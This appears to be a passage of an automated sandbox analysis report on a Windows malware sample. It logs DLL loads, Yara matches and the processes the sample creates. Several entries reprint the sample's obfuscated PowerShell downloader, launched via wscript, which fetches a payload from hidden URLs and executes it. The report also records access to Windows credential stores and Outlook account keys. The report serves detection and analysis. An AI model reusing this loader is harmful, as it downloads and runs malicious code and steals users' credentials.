              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: edputil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wintypes.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: appresolver.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: bcp47langs.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: slc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: userenv.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sppc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1844677982.0000000002D05000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb>b source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("PowerShell", ""cls;write 'Stumpnser Midernes Fugtighe", "", "", "0");
              Source: Yara match File source: 00000005.00000002.1856054813.00000000090AD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fattigfint)$global:Rudyard = [System.Text.Encoding]::ASCII.GetString($Oratorically)$global:Bestiller=$Rudyard.substring($Spidskandidaternes,$Amphitoky)<#Consultatively Kulminationer
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unpumicated $Inddmningdducible $Tamburmajors), (Muscologist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tidslernes222 = [AppDomain]::CurrentDomain.GetA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cestode)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Uranosphaerite, $false).DefineType($Postboy, $Seq
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fattigfint)$global:Rudyard = [System.Text.Encoding]::ASCII.GetString($Oratorically)$global:Bestiller=$Rudyard.substring($Spidskandidaternes,$Amphitoky)<#Consultatively Kulminationer
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l 